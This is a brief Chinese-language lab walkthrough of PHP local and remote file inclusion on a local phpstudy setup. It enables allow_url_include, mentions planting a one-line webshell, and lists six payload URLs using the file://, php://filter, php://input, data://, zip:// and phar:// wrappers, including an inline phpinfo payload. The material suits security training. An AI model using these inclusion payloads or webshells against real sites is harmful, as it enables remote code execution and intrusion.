环境配置
步骤一:更改参数
php.ini ⾥有两个重要的参数 allow_url_fopen 、allow_url_include
步骤二:创建123.php文件输入一句话木马
步骤三:创建1.php
less-1 file://协议
123.php?cmd=file://D:\phpstudy_pro\WWW\1.php
less-2 php://filter协议
base解码
less-3 php://input协议
123.php?cmd=php://input利用burp抓包
更改传参方式
更改参数进行放包
less-4 data://
123.php?cmd=data:text/plain,<?php phpinfo();?>
less-5 zip://
创建2.txt文件进行压缩
123.php?cmd=zip://D:\phpstudy_pro\WWW\2.zip%232.txt
less-6 phar://
123.php?cmd=phar://D:\phpstudy_pro\WWW\2.zip\2.txt
